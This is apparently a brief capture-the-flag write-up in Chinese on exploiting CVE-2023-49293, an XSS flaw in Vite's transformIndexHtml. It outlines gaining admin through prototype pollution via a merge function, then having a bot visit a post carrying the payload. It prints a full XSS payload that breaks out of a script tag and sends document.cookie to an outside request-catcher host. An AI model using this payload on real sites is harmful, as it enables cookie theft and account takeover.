CVE-2023-49293

Pasted%20image%2020240116104629
template = await vite.transformIndexHtml(url, template);存在漏洞,可以触发xss

先用merge触发原型链污染得到admin身份,然后写文章让bot去访问,带上cve的Payload
url?"></script><script>window.location.href=`https://dionysus.requestcatcher.com/${btoa(document.cookie)}`</script>